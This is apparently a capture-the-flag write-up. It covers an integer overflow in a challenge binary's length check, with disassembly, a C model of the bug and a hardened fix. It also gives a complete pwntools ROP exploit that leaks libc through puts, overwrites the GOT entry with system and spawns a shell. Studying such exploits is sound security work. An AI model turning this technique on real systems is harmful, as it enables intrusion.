Execution
Running the binary lets you enter an integer, and this is where the integer overflow occurs.
After that you can enter a comment, but with ordinary input you cannot control ret.
So if you enter -2147483648, the part that reads the comment afterwards subtracts 1 from it, which turns it into a positive number.
After that you just do ROP.
```
gef➤ disass main
Dump of assembler code for function main:
0x00000000004012ad <+0>: endbr64
0x00000000004012b1 <+4>: push rbp
0x00000000004012b2 <+5>: mov rbp,rsp
0x00000000004012b5 <+8>: sub rsp,0x70
0x00000000004012b9 <+12>: mov DWORD PTR [rbp-0x4],0x0
0x00000000004012c0 <+19>: lea rax,[rip+0xd41] # 0x402008
0x00000000004012c7 <+26>: mov rdi,rax
0x00000000004012ca <+29>: call 0x4010b0 <puts@plt>
0x00000000004012cf <+34>: lea rax,[rip+0xd4f] # 0x402025
0x00000000004012d6 <+41>: mov rdi,rax
0x00000000004012d9 <+44>: mov eax,0x0
0x00000000004012de <+49>: call 0x4010c0 <printf@plt>
0x00000000004012e3 <+54>: lea rax,[rbp-0x4]
0x00000000004012e7 <+58>: mov rsi,rax
0x00000000004012ea <+61>: lea rax,[rip+0xd39] # 0x40202a
0x00000000004012f1 <+68>: mov rdi,rax
0x00000000004012f4 <+71>: mov eax,0x0
0x00000000004012f9 <+76>: call 0x401110 <__isoc99_scanf@plt>
0x00000000004012fe <+81>: mov eax,DWORD PTR [rbp-0x4]
0x0000000000401301 <+84>: cmp eax,0x64
0x0000000000401304 <+87>: jle 0x40131c <main+111>
0x0000000000401306 <+89>: lea rax,[rip+0xd23] # 0x402030
0x000000000040130d <+96>: mov rdi,rax
0x0000000000401310 <+99>: call 0x4010b0 <puts@plt>
0x0000000000401315 <+104>: mov eax,0x0
0x000000000040131a <+109>: jmp 0x401372 <main+197>
0x000000000040131c <+111>: mov eax,DWORD PTR [rbp-0x4]
0x000000000040131f <+114>: mov esi,eax
0x0000000000401321 <+116>: lea rax,[rip+0xd2c] # 0x402054
0x0000000000401328 <+123>: mov rdi,rax
0x000000000040132b <+126>: mov eax,0x0
0x0000000000401330 <+131>: call 0x4010c0 <printf@plt>
0x0000000000401335 <+136>: lea rax,[rip+0xd2c] # 0x402068
0x000000000040133c <+143>: mov rdi,rax
0x000000000040133f <+146>: call 0x4010b0 <puts@plt>
0x0000000000401344 <+151>: mov eax,DWORD PTR [rbp-0x4]
0x0000000000401347 <+154>: sub eax,0x1
0x000000000040134a <+157>: movsxd rdx,eax
0x000000000040134d <+160>: lea rax,[rbp-0x70]
0x0000000000401351 <+164>: mov rsi,rax
0x0000000000401354 <+167>: mov edi,0x0
0x0000000000401359 <+172>: call 0x4010e0 <read@plt>
0x000000000040135e <+177>: lea rax,[rip+0xd22] # 0x402087
0x0000000000401365 <+184>: mov rdi,rax
0x0000000000401368 <+187>: call 0x4010b0 <puts@plt>
0x000000000040136d <+192>: mov eax,0x0
0x0000000000401372 <+197>: leave
0x0000000000401373 <+198>: ret
End of assembler dump.
```
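To show why -2147483648 gets past the check, here is an added C model (my own code, not the challenge's source, which the post does not include) of the length computation in main, cmp eax,0x64 / sub eax,0x1 / movsxd rdx,eax, next to a bounds check that closes the hole. BUF_SIZE and MAX_LEN are read off the disassembly; the function names and the sample inputs are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define BUF_SIZE 0x6c   /* bytes from [rbp-0x70] up to the counter at [rbp-0x4] */
#define MAX_LEN  100    /* the bound in "cmp eax,0x64" */

/* Models the binary's length computation: the check only rejects n > 100,
 * then "sub eax,0x1" and "movsxd rdx,eax" produce the read() count.
 * Unsigned arithmetic reproduces the CPU's wrap-around without signed-overflow
 * undefined behaviour (the cast back to int32_t wraps on gcc/clang).
 * Returns the count passed to read(), or 0 when the check rejects n. */
size_t vulnerable_read_len(int32_t n) {
    if (n > MAX_LEN)
        return 0;
    int32_t len = (int32_t)((uint32_t)n - 1u);  /* INT_MIN - 1 wraps to INT_MAX */
    return (size_t)(int64_t)len;                /* movsxd: sign-extend to 64 bits */
}

/* Hardened version: require 1 <= n <= MAX_LEN before subtracting, and clamp the
 * count to the destination buffer so no value can reach the saved rbp or ret. */
size_t hardened_read_len(int32_t n) {
    if (n < 1 || n > MAX_LEN)
        return 0;
    size_t len = (size_t)n - 1;
    return len > BUF_SIZE ? BUF_SIZE : len;
}

/* 1 if a read() of len bytes into the 0x6c-byte buffer would overrun it. */
int overflows(size_t len) {
    return len > BUF_SIZE;
}

int main(void) {
    /* constructed sample inputs: in range, the boundary, too large, zero, INT_MIN */
    int32_t inputs[] = { 10, 100, 101, 0, INT32_MIN };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        size_t v = vulnerable_read_len(inputs[i]);
        printf("n=%11d  vulnerable=%20zu%s  hardened=%3zu\n", inputs[i], v,
               overflows(v) ? " (overflow)" : "", hardened_read_len(inputs[i]));
    }
    return 0;
}
```

The model shows that the original check rejects only large values, so any non-positive n slips through and the subtraction turns it into a count far beyond the 0x6c-byte buffer.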
```python
from pwn import *

p = process("./challenge")
e = ELF("./challenge")
r = ROP("./challenge")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# context.log_level = 'debug'
# pause()

# INT_MIN passes the "<= 100" check; the binary then subtracts 1,
# which wraps to INT_MAX and becomes the read() length.
p.sendlineafter(b".\n", b'-2147483648')

binsh = b"/bin/sh\x00"
bss = 0x404070
prdi = 0x00401237   # pop rdi; ret
ppr = 0x00401236    # pop rsi; pop rdi; ret
pppr = 0x00401235   # pop rdx; pop rsi; pop rdi; ret
puts_got = 0x404018
puts_plt = 0x4010b0

payload = b'a' * 0x78            # buffer (0x6c) + counter (4) + saved rbp (8)
# 1. leak the libc address of puts via puts(puts@got)
payload += p64(prdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
# 2. read "/bin/sh" into .bss
payload += p64(pppr)             # pop rdx; pop rsi; pop rdi; ret
payload += p64(len(binsh))       # 8; the original had len(str(binsh)) == 14, which read() tolerated
payload += p64(bss)
payload += p64(0)
payload += p64(e.plt['read'])
# 3. read 8 bytes over puts@got
payload += p64(pppr)             # pop rdx; pop rsi; pop rdi; ret
payload += p64(8)
payload += p64(puts_got)
payload += p64(0)
payload += p64(e.plt['read'])
# 4. puts(bss) now goes through the overwritten GOT entry
payload += p64(prdi)
payload += p64(bss)
payload += p64(puts_plt)
p.sendafter(b"t.\n", payload)

p.recvuntil(b'[*] Thank you!\n')
puts_addr = u64((p.recvn(6)).ljust(8, b"\x00"))
print(hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base", hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print(hex(system_addr))

p.send(binsh)                    # consumed by the first read()
p.send(p64(system_addr))         # consumed by the second read()
p.interactive()
```
This post was written with Obsidian.